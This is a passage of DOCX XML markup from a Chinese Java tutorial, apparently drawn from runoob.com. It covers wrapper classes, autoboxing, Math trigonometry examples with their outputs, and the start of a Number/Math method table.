              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="319AFB15" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>基本数据类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="31A92257" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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73929A15"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Boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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5A2DFF54"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boolean</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="31395CEF" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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409741DE"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Byte</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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05C6A876"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byte</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="1F8CFB07" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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00AEFACB"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Short</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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53D7F98A"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short</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="5920D876" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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7E86FCF4"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Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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1BA30C70"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int</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="6C81853B" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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5C1D1469"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Long</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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62A4EF69"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long</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="41D224D6" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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3FE10C77"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Character</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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37A7F797"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char</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="0CDEDA75" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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35DBFC6F"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lastRenderedPageBreak/>
              <w:t>Float</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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53700E3B"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float</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="753803DF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="90"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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5C6F78FE"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Double</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>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3B8194D8"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double</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="00F98750" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300" wp14:anchorId="62A00AA6" wp14:editId="30C56C4B">
            <wp:extent cx="5191125" cy="2238375"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1905"/>
            <wp:docPr id="3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descr="IMG_256"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId222"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5191125" cy="2238375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FC8C0EE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这种由编译器特别支持的包装称为装箱，所以当内置数据类型被当作对象使用的时候，编译器会把内置类型装箱为包装类。相似的，编译器也可以把一个对象拆箱为内置类型。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Number </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类属于</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.lang </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>包。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="539E657E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7EA881E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Integer</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>对象实例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218BEFFB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class Test{</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1082363F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static void main(String[] args){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E67BBFE" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      Integer x = 5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CA3E674" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      x =  x + 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56CCA843" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      System.out.println(x); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045FEE0E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F3C4F26" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B54A41" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三角函数</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00EE9DB9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">public class Test {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D256A4B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    public static void main (String []args)  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6B9FE7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    {  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE2525C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println("90 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>度的正弦值：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">" + Math.sin(Math.PI/2));  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7E6D90" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println("0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>度的余弦值：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">" + Math.cos(0));  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3DF47F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println("60</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>度的正切值：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">" + Math.tan(Math.PI/3));  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FD9750A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println("1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的反正切值：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> " + Math.atan(1));  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346BF6B9" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>π</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>/2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的角度值：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">" + Math.toDegrees(Math.PI/2));  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE4D4E0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">        System.out.println(Math.PI);  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C75BA8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">    }  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38142468" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77C58497" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>输出：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F7C9AC0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">90 </w:t>
      </w:r>
      <w:r>
        <w:t>度的正弦值：</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A49A85F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>度的余弦值：</w:t>
      </w:r>
      <w:r>
        <w:t>1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16CCF84A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>60</w:t>
      </w:r>
      <w:r>
        <w:t>度的正切值：</w:t>
      </w:r>
      <w:r>
        <w:t>1.7320508075688767</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="505DF610" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>的反正切值：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 0.7853981633974483</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB5B315" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>π/2</w:t>
      </w:r>
      <w:r>
        <w:t>的角度值：</w:t>
      </w:r>
      <w:r>
        <w:t>90.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38A3FC5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>3.141592653589793</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0614ECBA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Number &amp; Math </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类方法</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="9925" w:type="dxa"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="885"/>
        <w:gridCol w:w="9040"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C452C" w14:paraId="29064BEE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="6BCA61DA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>序号</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="555555"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="555555"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="555555"/>
            <w:tcMar>
              <w:top w:w="36" w:type="dxa"/>
              <w:left w:w="36" w:type="dxa"/>
              <w:bottom w:w="36" w:type="dxa"/>
              <w:right w:w="36" w:type="dxa"/>
            </w:tcMar>
          </w:tcPr>
          <w:p w14:paraId="4E18D092" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
            <w:pPr>
              <w:widowControl/>
              <w:jc w:val="left"/>
              <w:textAlignment w:val="top"/>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:t>方法与描述</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="7F6BDCE8" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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719BA999"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1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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7BC63F00"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hyperlink r:id="rId223" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>xxxValue()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>将 Number 对象转换为xxx数据类型的值并返回。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="29E44459" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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68069E80"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2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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60FB75D5"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hyperlink r:id="rId224" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>compareTo()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>将number对象与参数比较。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="2C3285A0" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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351EC740"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3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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78CEAF93"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hyperlink r:id="rId225" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>equals()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>判断number对象是否与参数相等。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="408309BE" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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293D2245"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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29586E0F"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hyperlink r:id="rId226" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
                  <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                  <w:color w:val="006600"/>
                  <w:sz w:val="15"/>
                  <w:szCs w:val="15"/>
                </w:rPr>
                <w:t>valueOf()</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Helvetica" w:eastAsia="Helvetica" w:hAnsi="Helvetica" w:cs="Helvetica"/>
                <w:color w:val="333333"/>
                <w:kern w:val="0"/>
                <w:sz w:val="15"/>
                <w:szCs w:val="15"/>
                <w:lang w:bidi="ar"/>
              </w:rPr>
              <w:br/>
              <w:t>返回一个 Number 对象指定的内置数据类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C452C" w14:paraId="1A9D291E" w14:textId="77777777">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="885" w:type="dxa"/>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7E19A51F"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9040" w:type="dxa"/>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38E09411"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hyperlink r:id="rId227" w:tgtFrame="https://www.runoob.com/java/_blank" w:history="1">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="a5"/>
